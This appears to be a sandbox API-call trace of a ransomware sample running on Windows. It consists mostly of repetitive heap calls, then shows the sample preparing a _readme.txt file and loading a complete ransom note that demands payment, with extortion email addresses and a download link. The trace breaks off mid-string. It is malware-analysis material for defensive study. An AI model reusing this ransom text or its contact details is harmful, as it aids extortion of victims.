[0183.561] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0183.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0183.561] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0183.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0183.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0183.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0183.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.578] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.579] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.579] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0183.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0183.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0183.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.586] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.586] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.587] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.587] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.587] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.587] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.588] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.588] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.588] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.588] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.589] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.589] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0183.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0183.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.597] PathFindFileNameW (pszPath="C:\\Boot\\es-ES\\") returned="es-ES\\" [0183.597] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0183.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.597] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0183.597] PathFindFileNameW (pszPath="") returned="" [0183.597] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0183.598] GetProcAddress (hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0183.598] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0183.598] FreeLibrary (hLibModule=0x759a0000) returned 1 [0183.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.599] PathAppendW (in: pszPath="C:\\Boot\\es-ES\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\es-ES\\_readme.txt") returned 1 [0183.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.599] PathFileExistsW (pszPath="C:\\Boot\\es-ES\\_readme.txt") returned 0 [0183.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x2ae3ea0 [0183.600] lstrcpyW (in: lpString1=0x2ae3ea0, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is 